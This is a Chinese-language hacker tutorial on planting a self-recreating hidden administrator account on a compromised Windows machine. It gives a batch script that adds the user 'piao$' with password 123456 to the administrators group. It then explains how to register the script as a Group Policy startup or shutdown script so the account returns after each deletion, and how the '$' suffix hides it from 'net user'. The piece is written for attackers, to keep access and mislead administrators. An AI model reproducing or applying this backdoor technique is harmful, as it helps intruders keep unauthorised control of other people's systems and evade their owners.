黑客和管理员之间可谓水火不容,当我们在肉鸡上建立了管理员帐号后,不用多久就会被肉鸡管理员发现并删除。即使我们通过一些帐号隐藏手段隐藏了帐号,结果还是很难逃过管理员的眼睛。既然我们在肉鸡上的帐号是建一次就被删一次,那么我们索性就赖在系统中不走了,看我如何在系统中建立“无赖”帐号。
什么样的帐号才是无赖帐号呢?让管理员看不到并不算无赖,真正的无赖帐号是让管理员删一次就自动生成一次,让管理员永远删不完,同时管理员还不知道这是怎么一回事。那么我们如何实现这样的效果呢?其实我们不用借助别的工具,只需用到系统组策略中内置的启动脚本就可以了。
首先我们要新建一个脚本文件,在记事本中输入如下内容:
net user piao$ 123456 /add
net localgroup administrators piao$ /add
这个脚本的作用是添加一个用户名为piao$,密码为123456的帐号,并且将piao$账号添加到administrators(管理员)组。将文件另存为user.bat,并且将user.bat文件放到system32\GroupPolicy\Machine\Scripts\Startup目录。
然后我们单击“开始”菜单→“运行”,输入“gpedit.msc”运行“组策略”,接着依次展开“本地计算机策略”→“计算机配置”→“Windows设置”→“脚本(启动/关机)”。在右侧我们可以看到“启动”和“关机”两个脚本。双击其中的“启动”脚本,会打开“启动 属性”窗口。
图1.组策略中的脚本设置选项
在“启动 属性”窗口中单击“添加”按钮,单击“脚本名”处的“浏览”按钮,浏览选中刚才建立的user.bat文件。在“脚本参数”中填入“c:\windows\system32\net.exe”,单击“确定”按钮完成设置。
小贴士:建立帐号时在用户名后添加一个“$”号,可以达到简单隐藏的效果,管理员在“命令提示符”中输入“net user”命令将无法看到你建立的帐号,但是在“控制面板”的“计算机管理”中会显示无遗。
这样设置后,肉鸡每次重启都会建立一个名为piao$的管理员帐号,即使管理员把帐号删除了,下次重启后又会重新出现。这里我们不仅可以设置“启动”脚本,也可以设置“关机”脚本,设置方法是一样的,只不过前者是开机建立帐号,后者是关机时建立帐号。
图2.添加自动建立账号脚本
这种无赖帐号的建立对于菜鸟管理员来说是很有效的,因为管理员会以为系统感染了木马,从而把全部注意力都集中在杀毒上,而忽略了系统自身的问题。当然,对于经验丰富的管理员而言这只是雕虫小技,有没有用就要看各位小黑的运气了。
相关文章
同类最新